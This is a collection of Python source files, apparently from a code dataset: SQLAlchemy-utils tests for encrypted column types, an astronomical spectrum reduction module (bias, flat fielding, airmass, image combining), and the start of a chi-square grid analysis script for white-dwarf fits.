test_simple_insert(self): catalog = self.create_catalog() assert catalog.product_price == 123 def test_replace_leaf_object(self): catalog = self.create_catalog() product = self.Product(price=44) catalog.category.sub_category.product = product self.session.flush() assert catalog.product_price == 44 def test_delete_leaf_object(self): catalog = self.create_catalog() self.session.delete(catalog.category.sub_category.product) self.session.flush() assert catalog.product_price is None ``` #### File: tests/types/test_encrypted.py ```python import sqlalchemy as sa from datetime import datetime, date, time import pytest from pytest import mark cryptography = None try: import cryptography except ImportError: pass from tests import TestCase from sqlalchemy_utils import EncryptedType, PhoneNumberType, ColorType from sqlalchemy_utils.types.encrypted import AesEngine, FernetEngine @mark.skipif('cryptography is None') class EncryptedTypeTestCase(TestCase): @pytest.fixture(scope='function') def user(self, request): # set the values to the user object self.user = self.User() self.user.username = self.user_name self.user.phone = self.user_phone self.user.color = self.user_color self.user.date = self.user_date self.user.time = self.user_time self.user.enum = self.user_enum self.user.datetime = self.user_datetime self.user.access_token = self.test_token self.user.is_active = self.active self.user.accounts_num = self.accounts_num self.session.add(self.user) self.session.commit() # register a finalizer to cleanup def finalize(): del self.user_name del self.test_token del self.active del self.accounts_num del self.test_key del self.searched_user request.addfinalizer(finalize) return self.session.query(self.User).get(self.user.id) def generate_test_token(self): import string import random token = '' characters = string.ascii_letters + string.digits for i in range(60): token += ''.join(random.choice(characters)) return token def create_models(self): # set some test values self.test_key = 'secretkey1234' self.user_name = u'someone' self.user_phone = u'(555) 555-5555' self.user_color = u'#fff' self.user_enum = 'One' self.user_date = date(2010, 10, 2) self.user_time = time(10, 12) self.user_datetime = datetime(2010, 10, 2, 10, 12) self.test_token = self.generate_test_token() self.active = True self.accounts_num = 2 self.searched_user = None class User(self.Base): __tablename__ = 'user' id = sa.Column(sa.Integer, primary_key=True) username = sa.Column(EncryptedType( sa.Unicode, self.test_key, self.__class__.encryption_engine) ) access_token = sa.Column(EncryptedType( sa.String, self.test_key, self.__class__.encryption_engine) ) is_active = sa.Column(EncryptedType( sa.Boolean, self.test_key, self.__class__.encryption_engine) ) accounts_num = sa.Column(EncryptedType( sa.Integer, self.test_key, self.__class__.encryption_engine) ) phone = sa.Column(EncryptedType( PhoneNumberType, self.test_key, self.__class__.encryption_engine) ) color = sa.Column(EncryptedType( ColorType, self.test_key, self.__class__.encryption_engine) ) date = sa.Column(EncryptedType( sa.Date, self.test_key, self.__class__.encryption_engine) ) time = sa.Column(EncryptedType( sa.Time, self.test_key, self.__class__.encryption_engine) ) datetime = sa.Column(EncryptedType( sa.DateTime, self.test_key, self.__class__.encryption_engine) ) enum = sa.Column(EncryptedType( sa.Enum('One', name='user_enum_t'), self.test_key, self.__class__.encryption_engine) ) self.User = User class Team(self.Base): __tablename__ = 'team' id = sa.Column(sa.Integer, primary_key=True) key = sa.Column(sa.String(50)) name = sa.Column(EncryptedType( sa.Unicode, lambda: self._team_key, self.__class__.encryption_engine) ) self.Team = Team def test_unicode(self, user): assert user.username == self.user_name def test_string(self, user): assert user.access_token == self.test_token def test_boolean(self, user): assert user.is_active == self.active def test_integer(self, user): assert user.accounts_num == self.accounts_num def test_phone_number(self, user): assert str(user.phone) == self.user_phone def test_color(self, user): assert user.color.hex == self.user_color def test_date(self, user): assert user.date == self.user_date def test_datetime(self, user): assert user.datetime == self.user_datetime def test_time(self, user): assert user.time == self.user_time def test_enum(self, user): assert user.enum == self.user_enum def test_lookup_key(self): # Add teams self._team_key = 'one' team = self.Team(key=self._team_key, name=u'One') self.session.add(team) self.session.commit() team_1_id = team.id self._team_key = 'two' team = self.Team(key=self._team_key) team.name = u'Two' self.session.add(team) self.session.commit() team_2_id = team.id # Lookup teams self._team_key = self.session.query(self.Team.key).filter_by( id=team_1_id ).one()[0] team = self.session.query(self.Team).get(team_1_id) assert team.name == u'One' with pytest.raises(Exception): self.session.query(self.Team).get(team_2_id) self.session.expunge_all() self._team_key = self.session.query(self.Team.key).filter_by( id=team_2_id ).one()[0] team = self.session.query(self.Team).get(team_2_id) assert team.name == u'Two' with pytest.raises(Exception): self.session.query(self.Team).get(team_1_id) self.session.expunge_all() # Remove teams self.session.query(self.Team).delete() self.session.commit() class TestAesEncryptedTypeTestcase(EncryptedTypeTestCase): encryption_engine = AesEngine def test_lookup_by_encrypted_string(self, user): test = self.session.query(self.User).filter( self.User.username == self.user_name ).first() assert test.username == user.username class TestFernetEncryptedTypeTestCase(EncryptedTypeTestCase): encryption_engine = FernetEngine ```
{ "source": "joshfuchs/photometry", "score": 2 }
#### File: joshfuchs/photometry/ReduceSpec_tools.py ```python import numpy as np #import pyfits as fits import astropy.io.fits as fits import os import datetime import matplotlib.pyplot as plt import cosmics from glob import glob from astropy.convolution import convolve, convolve_fft, Box2DKernel # =========================================================================== # Lesser Functions Used by Main Functions =================================== # =========================================================================== def init(): global diagnostic diagnostic = np.zeros([2071,8]) def save_diagnostic(): #This function save a diagnostic file to be used later to create diagnostic plots global now now = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M") header = 'Reduction done on ' + now + ' \n Columns are: 0) average from bias, 1) average from scaled bias, 2) standard deviation of bias \n 3) flat field average, 4) flat field standard deviation, 5) flat field scaled average, 6) flat field scaled standard deviation ' with open('reduction_' + now + '.txt','ab') as handle: np.savetxt(handle,diagnostic,fmt='%f',header=header) def gauss(x,p): #single gaussian return p[0] + p[1]*np.exp(-(((x-p[2])/(np.sqrt(2)*p[3])))**2.) def fitgauss(p,fjac=None,x=None,y=None,err=None): #Parameter values are passed in p #fjac = None just means partial derivatives will not be computed model = gauss(x,p) status = 0 return([status,(y-model)/err]) def gaussslope(x,p): #single gaussian return p[0] + p[1]*x + p[2]*np.exp(-(((x-p[3])/(np.sqrt(2)*p[4])))**2.) def fitgaussslope(p,fjac=None,x=None,y=None,err=None): #Parameter values are passed in p #fjac = None just means partial derivatives will not be computed model = gaussslope(x,p) status = 0 return([status,(y-model)/err]) def adcstat(specname): hdu = fits.getheader(specname) adc_stat = hdu['ADCSTAT'] print ('ADC status during observations was ', adc_stat) return adc_stat # ============================================================================ def Read_List( lst ): # This function reads a list of images and decomposes them into a python # list of image names. list_file = open(lst,'r') im_list = list_file.read() list_file.close() im_list = im_list.split() return im_list def List_Combe(img_list): # This is meant to combe trough list names to identify seperate sublist of # stars / flats / standars sub_lists= [] # list of sub_list of images sl= [] # sub_list of images sl.append(img_list[0]) # place first image in sublist i= 0; # image counter #img_list[0][0] is a string, so need to check that agaisnt strings. Use a shorter cutpoint if these are RAW images. This will help eliminate problems with short filenames. if (img_list[0][0] == '0') or (img_list[0][0] == '1') or (img_list[0][0] == '2'): cutpoint = 5 else: cutpoint = 10 while i < len(img_list)-1: # run trough all images if img_list[i+1].__contains__(img_list[i][cutpoint:]) == True: #Old = 4 sl.append(img_list[i+1]) # place it in the sub_list else: # if the images dont match: sub_lists.append(sl) # write the sublist to the list of sublist sl= [] # clear the sublist sl.append(img_list[i+1]) # append the image to the new list i= i+1 # image counter sub_lists.append(sl) # append the last sublist to the list of sublist return sub_lists # return the list of sub_list of images def check_file_exist(name): # This function is to be called before wirting a file. # This function checks if the file name already exist. # If it does it appends a number to the begining until # the name no longer matches the files in the directory. # List of files in directory listDirFiles = [f for f in os.listdir('.') if f.endswith('.fits')] # If "name" is in the derectory append a number i until it doent match # If name is not in directory then we simply return name if listDirFiles.__contains__(name): i= 2 while listDirFiles.__contains__(name): name= str(i) + name i= i+1 return name def Fix_Header( header ): # This function deletes the header cards that contain the badly coded # degree symbol '\xb0'. If they are not deleted pyfits won't write the # headers. bad_key = ['param0', 'param61', 'param62', 'param63'] for p in bad_key: if p in header: bad_str = header.comments[p] if '\xb0' in bad_str: del header[p] def decimal_dec(hdu_str): # Read header strings in "hh:mm:ss" or "dd:mm:ss" fromat # and outputs the value as a decimal. val_list = [float(n) for n in hdu_str.split(':')] #if val_list[0] < 0 : if str(val_list[0])[0] == '-': sng = -1 val_list[0] = sng*val_list[0] else: sng = 1 val_deci = sng*(val_list[0]+((val_list[1]+(val_list[2]/60.0))/60.0)) return val_deci def decimal_ra(hdu_str): # Read header strings in "hh:mm:ss" or "dd:mm:ss" fromat # and outputs the value as a decimal. val_list = [float(n) for n in hdu_str.split(':')] if val_list[0] < 0 : sng = -1. val_list[0] = sng*val_list[0] else: sng = 1. val_deci = 15.*sng*(val_list[0]+((val_list[1]+(val_list[2]/60.0))/60.0)) return val_deci def SigClip(data_set, lo_sig, hi_sig): # Sigma Cliping Function # # Input is set of counts for a particular pixel, # along with low and high sigma factors. # Output is a list containg only the data that is with the sigma factors. # Only a single rejection iteration is made. Avg = np.median(data_set) #remove_max = np.delete(data_set,data_set.argmax()) #St_Dev = np.std(remove_max) St_Dev = np.std(data_set) min_val = Avg-lo_sig*St_Dev max_val = Avg+hi_sig*St_Dev cliped_data = [] #masked_data = [] for val in data_set: if min_val <= val <= max_val: cliped_data.append( val ) #else: # masked_data.append( val) return cliped_data#, masked_data def RaDec2AltAz(ra, dec, lat, lst ): # Input: RA in decimal hours; DEC in decimal deg; # LAT in decimal deg; LST in decimal hours; # Output: ALT, AZ, HA in decimal deg. # Compute Hour Angle ha = lst-ra # hour angle in deg if ha < 0 : ha = ha+360. if ha > 360: ha = ha-360. # Convert Qunataties to Radians ra = ra*(np.pi/180.0) dec = dec*(np.pi/180.0) lat = lat*(np.pi/180.0) ha = ha*(np.pi/180.0) # Calculate Altitiude a = np.sin(dec)*np.sin(lat) b = np.cos(dec)*np.cos(lat)*np.cos(ha) alt = np.arcsin( a+b ) # altitude in radians # Calculate Azimuth a = np.sin(dec)-np.sin(lat)*np.sin(alt) b = np.cos(lat)*np.cos(alt) az = np.arccos( a/b ) # azumuth in radians if np.sin(ha) > 0: az = (2.*np.pi) - az # Convert Alt, Az, and Ha to decimal deg alt = alt*(180.0/np.pi) az = az*(180.0/np.pi) ha = ha*(180.0/np.pi) return alt, az, ha def AirMass(alt, scale): # Calculates instantaneus airmass to be called by SetAirMass() # # This comes from Allen, Astrophysical Quantities, page 125. # See also http://stsdas.stsci.edu/cgi-bin/gethelp.cgi?setairmass # Input: # scale = atmospheric scale factor (defalut 750) # alt = altitude of star in degrees. # Output: # AM = airmass from given altitude and scale factor x = scale*np.sin(np.pi*alt/180.) AM = np.sqrt( x**2. + 2.*scale + 1. ) - x return AM def EffectiveAirMass(AM_st, AM_mid, AM_end): # Calculate effective airmass to be called by SetAirMass() and Imcombine() # This comes from Stetson, 'Some Factors Affecting the Accuracy of Stellar # Photometry with CCDs,' DAO preprint, September 1988 and uses Simpson's rule. # See also http://stsdas.stsci.edu/cgi-bin/gethelp.cgi?setairmass # Input: airmass at start, middel, and end of an exposure. # Output: Effective Airmass AM_eff = (AM_st + 4.*AM_mid + AM_end)/6. return AM_eff def Add_Scale (img_block): # Function to be called by Imcombine. # The function is meant to additively sclae a set of images, (zeros in particular). # The input is a numpy block of pixel values (see imcombine). # The function calculates the average number of # counts of the region [25:75, 1700:1800] of the first image. # Then scales the rest of the images by adding the diffrence between the # average counts of the first image and its own. # Returns a scaled image block, and a list of scale values. print("Scaling Counts Additively.\n") ni, ny, nx = np.shape(img_block) Cavg= [] # Average Counts Sval= [] # Scale Values for i in range(0,ni): Cavg.append( np.mean(img_block[i,:,:]) ) Sval.append( Cavg[0]-Cavg[i] ) img_block[i]= img_block[i] + Sval[i] try: diagnostic[0:len(Cavg),0] = np.array(Cavg) except: pass return img_block, Sval def Mult_Scale (img_block,index): # Function to be called by Imcombine. # The function is meant to multiplicative sclae a set of images, (flats in particular). # The input is a numpy block of pixel values (see imcombine). # The function calculates the average number of # counts of the region [25:75, 1700:1800] of the first image. # Then scales the rest of the images by multiplying by the ratio between the # average counts of the first image and its own. # Returns a scaled image block, and a list of scale values. print("Scaling Counts Multiplicatively.\n") ni, ny, nx = np.shape(img_block) Cavg= [] # Average Counts Cstd = [] #Standard deviation Sval= [] # Scale Values for i in range(0,ni): Cavg.append( np.mean(img_block[i,:,:]) ) Cstd.append( np.std(img_block[i,:,:])) Sval.append( Cavg[0]/Cavg[i] ) img_block[i]= img_block[i]*Sval[i] try: if index == 1: diagnostic[0:len(Cavg),3] = np.array(Cavg) diagnostic[0:len(Cstd),4] = np.array(Cstd) except: pass return img_block, Sval # =========================================================================== # Main Functions ============================================================ # =========================================================================== def lacosmic(img): #This function runs LA Cosmic on the images #LA Cosmic is explained in PASP 113, 1420 (2001) #This implementation comes, originally, from http://www.astro.yale.edu/dokkum/lacosmic/ print('') print('Finding cosmic rays in ', img) datalist = fits.open(img) data = datalist[0].data data2 = data[0,:,:] array = data2 header = fits.getheader(img) Fix_Header(header) #gain = 1.33 #datalist[0].header['GAIN'] #1.33 from 2017-06-07 gain = datalist[0].header['GAIN'] rdnoise = datalist[0].header['RDNOISE'] c = cosmics.cosmicsimage(array, gain=gain, readnoise=rdnoise, sigclip = 5.0, sigfrac = 0.5, objlim = 4.0,satlevel=45000.0,verbose=True) c.run(maxiter=4) maskname = img[0:img.find('.fits')] + '_mask.fits' mask_array = np.expand_dims(c.mask,axis=0) mask_array = np.cast['uint8'](mask_array) mask_im = fits.PrimaryHDU(data=mask_array,header=header) mask_im.writeto(maskname,clobber=True) print('Mask image: ', maskname) cleanname = 'c' + img data_array = np.expand_dims(c.cleanarray,axis=0) header.set('MASK',maskname,'Mask of cosmic rays') clean_im = fits.PrimaryHDU(data=data_array,header=header) clean_im.writeto(cleanname,clobber=True) print('Clean image: ', cleanname) return cleanname, maskname def Bias_Subtract( img_list, zero_img ): # This function takes in a list of images and a bias image 'zero_img' # and performs a pixel by pixel subtration using numpy. # The function writes the bias subtracted images as 'b.Img_Name.fits'. # The output is a list of names for the bias subtrated images. print("\n====================\n") print('Bias Subtracting Images: \n') zero_data = fits.getdata(zero_img) bias_sub_list = [] for img in img_list: print(img) hdu = fits.getheader(img) Fix_Header(hdu) img_data = fits.getdata(img) img_data[ np.isnan(img_data) ] = 0 b_img_data = np.subtract(img_data, zero_data) print('b.'+"%s Mean: %.3f StDev: %.3f" % (img, np.mean(b_img_data), np.std(img_data))) hdu.set( 'DATEBIAS', datetime.datetime.now().strftime("%Y-%m-%d"), 'Date of Bias Subtraction' ) hdu.append( ('BIASSUB', zero_img ,'Image Used to Bias Subtract.'), useblanks= True, bottom= True ) NewHdu = fits.PrimaryHDU(b_img_data, hdu) #bias_sub_name= check_file_exist('b.'+img) bias_sub_name= 'b.'+img NewHdu.writeto(bias_sub_name, output_verify='warn', clobber= True) bias_sub_list.append( bias_sub_name ) return bias_sub_list # =========================================================================== def Norm_Flat_Avg( flat ): # Takes average value of all the pixels and devides the entier flat by # that value using numpy. print("\n====================\n") print('Normalizing %s By Dividing Each Pixel By Average Value:' % ( flat )) # Read Data, take average, and divide # flat_data = fits.getdata(flat) flat_data[ np.isnan(flat_data) ] = 0 # Calculate Average of the flat excluding bottom row and overscan regions # avg_flat = np.average( flat_data[:,:,:] ) norm_flat_data = np.divide( flat_data, float(avg_flat) ) print('Average Value: %s\n' % avg_flat) # Copy Header, write changes, and write file # hdu = fits.getheader(flat) Fix_Header(hdu) hdu.append( ('NORMFLAT', avg_flat,'Average Used to Normalize the Flat.'), useblanks= True, bottom= True ) NewHdu = fits.PrimaryHDU(data= norm_flat_data, header= hdu) #norm_flat_name= check_file_exist('n'+flat) norm_flat_name= 'n'+flat NewHdu.writeto(norm_flat_name, output_verify='warn', clobber= True ) print ('Flat: %s Mean: %.3f StDev: %.3f' % (norm_flat_name, np.mean(norm_flat_data), np.std(norm_flat_data))) return (norm_flat_name) # ============================================================================ # =========================================================================== def Flat_Field( spec_list, flat ): # This Function divides each spectrum in spec_list by the flat and writes # The new images as fits files. The output is a list of file names of # the flat fielded images. print("\n====================\n") print('Flat Fielding Images by Dividing by %s\n' % (flat)) np.seterr(divide= 'warn') flat_data = fits.getdata(flat) ''' #If flat is a blue spectrum, find the Littrow ghost and add those pixels to the header if 'blue' in flat.lower(): #See if littrow_ghost.txt already exists file_exist = glob('littrow_ghost.txt') if len(file_exist) == 1: littrow_location = np.genfromtxt('littrow_ghost.txt') littrow_ghost = [littrow_location[0],littrow_location[1]] fit_data = np.median(flat_data[75:85],axis=0) low_index = 1210. #Lowest pixel to search within high_index = 1710. #highest pixel to search within fit_data1 = fit_data[low_index:high_index] fit_pix1 = np.linspace(low_index,low_index+len(fit_data1),num=len(fit_data1)) diagnostic[0:len(fit_pix1),17] = fit_pix1 diagnostic[0:len(fit_data1),18] = fit_data1 diagnostic[0,21] = littrow_ghost[0] diagnostic[1,21] = littrow_ghost[1] else: littrow_ghost = find_littrow(flat) litt_low = int(littrow_ghost[0]) litt_hi = int(littrow_ghost[1]) try: hduflat = fits.getheader(flat) stitchloc = hduflat['STITCHLO'] #print stitchloc except: stitchloc = 'None' pass else: littrow_ghost = 'None' stitchloc = 'None' ''' f_spec_list = [] if isinstance(spec_list,str): spec_list = [spec_list] #Ensure that spec_list is actually a list for spec in spec_list: spec_data = fits.getdata(spec) f_spec_data = np.divide(spec_data, flat_data) f_spec_data[ np.isnan(f_spec_data) ] = 0 print("f"+"%s Mean: %.3f StDev: %.3f" % (spec, np.mean(f_spec_data), np.std(f_spec_data) )) hdu = fits.getheader(spec) Fix_Header(hdu) hdu.set('DATEFLAT', datetime.datetime.now().strftime("%Y-%m-%d"), 'Date of Flat Fielding') hdu.append( ('FLATFLD', flat,'Image used to Flat Field.'), useblanks= True, bottom= True ) NewHdu = fits.PrimaryHDU(data= f_spec_data, header= hdu) #new_file_name= check_file_exist('f'+spec) new_file_name= 'f'+spec NewHdu.writeto(new_file_name, output_verify='warn', clobber= True) f_spec_list.append(new_file_name) return f_spec_list # =========================================================================== def SetAirMass(img, lat= -30.238, scale= 750): # This Function Calculates The Effective Airmass of a single image # Inputs: # img = image name # lat = latitude of observer in decimal degrees. # (Default Soar lat: '-30:14:16.8' = -30.238 deg) # scale = atmospheric scale factor 750 # Output: # AMeff = effective airmass for single image # Image Info # hdulist = fits.open(img, 'update') hdu = hdulist[0] Fix_Header(hdu.header) ra = decimal_ra( hdu.header['RA'] ) # hours dec = decimal_dec( hdu.header['DEC'] ) # deg lst_st = decimal_ra( hdu.header['LST'] ) # start exposure LST in hours exp = hdu.header['EXPTIME'] # sec lst_mid = lst_st + (exp/2.)/3600. # mid exposure LST in hours lst_end = lst_st + (exp)/3600. # end exposure LST in hours # Air Mass Calculations # times = [lst_st, lst_mid, lst_end] AM = [] for t in times: alt, az, ha = RaDec2AltAz(ra, dec, lat, t ) airmass = AirMass(alt, scale) AM.append( airmass ) AMeff = EffectiveAirMass(AM[0], AM[1], AM[2]) # Print and write to header # print('\nImage:', img) print('Observatory Latitude: %s' % lat) print('AM_st AM_mid AM_end AM_eff') print('%5.4f %5.4f %5.4f %5.4f' % (AM[0], AM[1], AM[2], AMeff)) hdu.header.set( 'AIRMASS', np.round(AMeff,6) , 'Calculated Effective Airmass' ) hdulist.close() return AMeff # =========================================================================== def imcombine(im_list, output_name, method, lo_sig = 10, hi_sig = 3, overwrite= False, mask=False): # Image Combination Script # # Inputs: # im_list = mist be a python list of images or "@listfile" # output_name = name of combined fits image # method = The method to use for combining (median, average, sum) # lo_sig = low sigma cliping factor (default = 3 sigma) # hi_sig = high sigma cliping factor (default = 3 sigma) # overwrite = if true go ahead and re write existing file 'output_name' # if false it will warn you and ask for new output_name. # (default false) # Output: # After succefully combining, calculateing airmass, and writing to fits file, # The return of this function is the name of the combined # image (Output_name). print("\n====================\n") print("Combining Images:") print("Using %s of count values." % method) print("Sigma Cliping Factors (low, high): (%s, %s)\n" % (lo_sig, hi_sig)) # Read image data and put it in a numpy block # Ni = len(im_list) for i in range(0, Ni): # First size the array to contain the data based on 1st image # # Create block with 3 axis: # axis[0] has length of number of images. # axis[1] is the vertical axis of the chip. # axis[2] is the horizontal axis of the chip. if i == 0: img_data = fits.getdata(im_list[i]) #n,Ny,Nx = np.shape(img_data) Ny = img_data.shape[-2] Nx = img_data.shape[-1] img_block = np.ndarray( shape= (Ni,Ny,Nx) ) img_block[i,:,:] = img_data if (not mask) is False: mask_data = fits.getdata(mask[i]) mask_block = np.ndarray(shape= (Ni,Ny,Nx) ) mask_block[i,:,:] = mask_data # Then go ahead and read the rest of the images into the block # else: img_block[i,:,:] = fits.getdata(im_list[i]) if (not mask) is False: mask_block[i,:,:] = fits.getdata(mask[i]) # set nan values to zero # img_block[ np.isnan(img_block) ] = 0 # If Zero Additive Scale Images # if im_list[0].lower().__contains__("zero"): img_block, Scale = Add_Scale(img_block) # If Flats Multiplicative Scale Images # elif im_list[0].lower().__contains__("flat"): index = 1. img_block, Scale= Mult_Scale(img_block,index) ''' if im_list[0].lower().__contains__("blue"): index = 1. img_block, Scale= Mult_Scale(img_block,index) elif im_list[0].lower().__contains__("red"): index = 2. img_block, Scale= Mult_Scale(img_block,index) ''' # If Not, Dont Scale # else: print("Did Not Scale Images.\n") Scale= np.empty(Ni) Scale[:]= np.NaN # Print Name and Statistics of Each image % avgarr,stdarr = np.zeros(Ni), np.zeros(Ni) for i in range(0,Ni): #Avg= np.mean(img_block[i,25:75,1700:1800]) #Std= np.std(img_block[i,25:75,1700:1800]) Avg = np.mean(img_block[i,:,:]) Std = np.std(img_block[i,:,:]) avgarr[i] = Avg stdarr[i] = Std print( "%02d: %s ScaleValue:% .3f Mean: %.3f StDev: %.3f" % (i, im_list[i], Scale[i], Avg, Std) ) #Save Values to diagnostic array try: if im_list[0].lower().__contains__("zero"): diagnostic[0:len(avgarr),1] = avgarr diagnostic[0:len(stdarr),2] = stdarr if im_list[0].lower().__contains__("flat"): diagnostic[0:len(avgarr),5] = avgarr diagnostic[0:len(stdarr),6] = stdarr except: pass ## Combine the images acording to input "method" using SigmaClip() above ## comb_img = np.ndarray( shape= (1,Ny,Nx), dtype='float32') ##mask_img = np.ndarray( shape= (1,Ny,Nx), dtype='float32') while True: # Contunualy askes for method if input is wierd # if method == 'median': for y in range(0,Ny): for x in range(0,Nx): counts = img_block[:,y,x] val = np.median( SigClip(counts, lo_sig, hi_sig) ) comb_img[0,y,x] = np.float32(val) break # exit while loop elif method == 'average': for y in range(0,Ny): for x in range(0,Nx): if (not mask) is False: counts = img_block[:,y,x] masks = mask_block[:,y,x].astype(bool) mx = np.ma.masked_array(counts,masks) val = mx.mean() #We don't want to sigma clip if already masking #if True in masks: # print counts # print masks # print val # print '' else: counts = img_block[:,y,x] #counts_good, counts_bad = SigClip(counts, lo_sig, hi_sig) val = np.average( SigClip(counts, lo_sig, hi_sig) ) #val = np.average(counts_good) comb_img[0,y,x] = np.float32(val) #mask = np.average(counts_bad) #mask_img[0,y,x] = np.float32(mask) #mask_image = fits.PrimaryHDU(data=mask_img) #mask_image.writeto('Mask.fits') break # exit while loop elif method == 'sum': for y in range(0,Ny): for x in range(0,Nx): counts = img_block[:,y,x] val = np.sum( SigClip(counts, lo_sig, hi_sig) ) comb_img[0,y,x] = np.float32(val) #print img_block[:,100,50] #print comb_img[:,100,50] break # exit while loop else: # if 'method' input is wanky, ask for method again. print("\nError: Method NOT AVALABLE.") print("Available Methods: ('median', 'average', 'sum')") print("Enter Valid Method") method = input('>>>') # Set NAN values to zero comb_img[ np.isnan(comb_img) ] = np.float32(0) ###### Calculate Effetive Airmass for combined image ###### # The EffAM value is writen into the header in the next section # print('\nCalculating Effective Airmass:') # if were just combining 2 images # if Ni == 2: AM0 = SetAirMass(im_list[0]) AM2 = SetAirMass(im_list[1]) AM1 = (AM0+AM2)/2 EffAM = EffectiveAirMass(AM0, AM1, AM2) print('\nEffective Airmass of combined image: %5.4f' % EffAM) # if were combining an odd number of images # elif Ni%2 == 1: images = [ im_list[0], im_list[Ni//2], im_list[-1] ] AM = [ SetAirMass(img) for img in images ] EffAM = EffectiveAirMass( AM[0], AM[1], AM[2] ) print('\nEffective Airmass of combined image: %5.4f' % EffAM) # if were combing an even number of images # elif Ni%2 == 0: images = [im_list[0], im_list[(Ni//2)-1], im_list[Ni//2], im_list[-1]] AM = [ SetAirMass(img) for img in images ] EffAM = EffectiveAirMass( AM[0], (AM[1]+AM[2])/2, AM[3]) print('\nEffective Airmass of combined image: %5.4f' % (EffAM)) # Otherwise we fail # else: print("Eff AirMass calculation failed? This never happens!") ###### Overwrite Protection loop, just in case ###### if overwrite == False: from os.path import isfile while overwrite == False: # Outer Loop # # Breaks if file name doesnot exist or overwrite == true # exist = isfile(output_name) # Asks computer if file name exist # if exist == False: print("\nWriting combined image to fits file",output_name,"...") break # Break out of outter loop and continue writing # elif exist == True: while True: # Inner Loop # # Breaks if user wishes to overwite, abort, or gives new name. # loop also checks new names for existance. print("\nFile name",output_name,) print("already exist do you wish to overwrite?") yes_no = input('yes or no ?>>>') if yes_no == 'no': # If overwrite no: prompt new name or abort # print("\nEnter new file name or Ctrl-c to Abort ") output_name = input('>>>') print("\nNew File Name:= ", output_name) break # breaks out of Inner loop only. # Code proceeds to Outer Loop to # ask computer if new file name exist. elif yes_no == 'yes': # If overwrite yes: Break Inner Loop and Outer loop # overwrite = True print("\nOverwriting Image:", output_name) break else: # If yes_no input is wierd return to Inner loop # to ask question again. print("\nInput Not Recognized.") ###### The following part only runs if above while loop is satisfied ###### # Copy header of first image in im_list and fix degree symbol issue. hdulist = fits.open(im_list[0]) hdu = hdulist[0] # This checks the string and deletes the bad keywords from header. Fix_Header(hdu.header) # Write Effective Airmass into header # hdu.header.set('AIRMASS',np.round(EffAM,6),'Calculated Effective Airmass') #Write date of image combination to header # hdu.header.set('DATECOMB', datetime.datetime.now().strftime("%Y-%m-%d"), 'Date of Image combination') # Write the imcombine information into header # N = len(im_list) for i in range(0,N): num = str(i+1).zfill(3) key = 'IMCMB'+num hdu.header.append( (key, im_list[i]), useblanks= True, bottom= True ) hdu.header.append( ('NCOMBINE', N), useblanks= True, bottom = True ) hdu.header.append( ('COMBTYPE', method,'Operation Used to Combine'), useblanks= True, bottom= True ) # Make sure header BITPIX reflects data encodeing as float 32 ie: -32 hdu.header['BITPIX'] = -32 # Write header to new fits file #new_file_name= check_file_exist(output_name) new_file_name= output_name hdu.writeto(new_file_name, output_verify='warn', clobber= True) # write combined data to new fits file # fits.update(output_name, data= comb_img, header= hdu.header, output_verify='warn') print( "\nCombined Image: %s Mean: %.3f StDev: %.3f" % (new_file_name, np.mean(comb_img), np.std(comb_img)) ) return new_file_name # =========================================================================== # =========================================================================== # =========================================================================== ```
{ "source": "joshfuchs/ZZCeti_analysis", "score": 3 }
#### File: joshfuchs/ZZCeti_analysis/computechi.py ```python import numpy as np import os import mpfit import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D from scipy.interpolate import RectBivariateSpline import analysis_tools as at def parabola(x,p): return p[0] + p[1]*x + p[2]*x**2. def fitparabola(p,fjac=None,x=None,y=None,err=None): model = parabola(x,p) status = 0 return([status,(y-model)/err]) def polynomial2(x,y,p): return p[0] + p[1]*x + p[2]*x**2. + p[3]*x*y + p[4]*y**2. + p[5]*y def fitpolynomial2(p,fjac=None,x=None,y=None,z=None,err=None): model = polynomial2(x,y,p) status = 0 return([status,(z-model)/err]) def polynomial3(x,y,p): return p[0] + p[1]*x + p[2]*x**2. + p[3]*x**3. + p[4]*x**2.*y + p[5]*x*y + p[6]*x*y**2. + p[7]*y**3. + p[8]*y**2. + p[9]*y def fitpolynomial3(p,fjac=None,x=None,y=None,z=None,err=None): model = polynomial3(x,y,p) status = 0 return([status,(z-model)/err]) def paraboloid(x,y,p): return p[0]*(((x-p[1])/p[2])**2. + ((y-p[3])/p[4])**2.) + p[5] def fitparaboloid(p,fjac=None,x=None,y=None,z=None,err=None): model = paraboloid(x,y,p) status = 0 return([status,(z-model)/err]) #os.chdir('/afs/cas.unc.edu/depts/physics_astronomy/clemens/students/group/modelfitting/Koester_06/RESULTS') wdname = 'wcftb.WD1422p095_930_blue_flux_master' datedone = '06-20_4.28.txt' cutteff = False teff_limit = 14000. #Set up filenames to read allfile = 'chi_' + wdname + '_' + datedone print 'File: ', allfile alphafile = 'chi_' + wdname + '_alpha_' + datedone betafile = 'chi_' + wdname + '_beta_' + datedone gammafile = 'chi_' + wdname + '_gamma_' + datedone deltafile = 'chi_' + wdname + '_delta_' + datedone epsilonfile = 'chi_' + wdname + '_epsilon_' + datedone H8file = 'chi_' + wdname + '_H8_' + datedone H9file = 'chi_' + wdname + '_H9_' + datedone H10file = 'chi_' + wdname + '_H10_' + datedone #Read in first grid to determine range of spacing of variables with open(allfile,'r') as f: first_line = f.readline() try: bottomg,stepg,topg,bottomt,stept,topt,numpoints = [float(x) for x in first_line[2:].split(",")] except: bottomg,stepg,topg,bottomt,stept,topt = [float(x) for x in first_line[2:].split(",")] teff = np.linspace(bottomt,topt,(topt-bottomt)/stept+1.,endpoint=True) logg = np.linspace(bottomg,topg,(topg-bottomg)/stepg+1.,endpoint=True) teffgrid, logggrid = np.meshgrid(teff,logg) ''' #Set up grid. This is saved in the header of the chi*txt file bottomt = 10000. topt = 15000. stept = 10. teff = np.linspace(bottomt,topt,(topt-bottomt)/stept+1.,endpoint=True) bottomg = 7.0 topg = 9.5 stepg = 0.05 logg = np.linspace(bottomg,topg,(topg-bottomg)/stepg+1.,endpoint=True) teffgrid, logggrid = np.meshgrid(teff,logg) ''' #Read in saved grids allchi = np.genfromtxt(allfile,dtype='d') try: alphachi = np.genfromtxt(alphafile,dtype='d') except: print 'No H-alpha file \n' pass betachi = np.genfromtxt(betafile,dtype='d') gammachi = np.genfromtxt(gammafile,dtype='d') deltachi = np.genfromtxt(deltafile,dtype='d') epsilonchi = np.genfromtxt(epsilonfile,dtype='d') H8chi = np.genfromtxt(H8file,dtype='d') H9chi = np.genfromtxt(H9file,dtype='d') H10chi = np.genfromtxt(H10file,dtype='d') ''' #Convert to reduced chi-square allchi 